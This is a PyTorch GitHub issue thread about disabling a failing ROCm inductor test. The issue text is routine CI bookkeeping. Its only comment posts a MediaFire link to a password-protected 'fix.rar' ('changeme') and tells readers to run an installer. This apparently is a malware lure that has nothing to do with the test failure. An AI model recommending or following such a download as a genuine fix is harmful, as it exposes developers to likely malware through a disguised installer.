### ISSUE TITLE
DISABLED test_mutable_custom_op_fixed_layout2_cuda (__main__.GPUTests)

### ISSUE THREAD

**Issue by zou3519** [pytorch/pytorch#134519]
Platforms: rocm

This test was disabled because it is failing on main branch ([recent examples](https://torch-ci.com/failure?failureCaptures=%5B%22inductor%2Ftest_torchinductor.py%3A%3AGPUTests%3A%3Atest_mutable_custom_op_fixed_layout2_cuda%22%5D)).

cc @jeffdaily @sunway513 @jithunnair-amd @pruthvistony @ROCmSupport @dllehr-amd @jataylo @hongxiayang

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
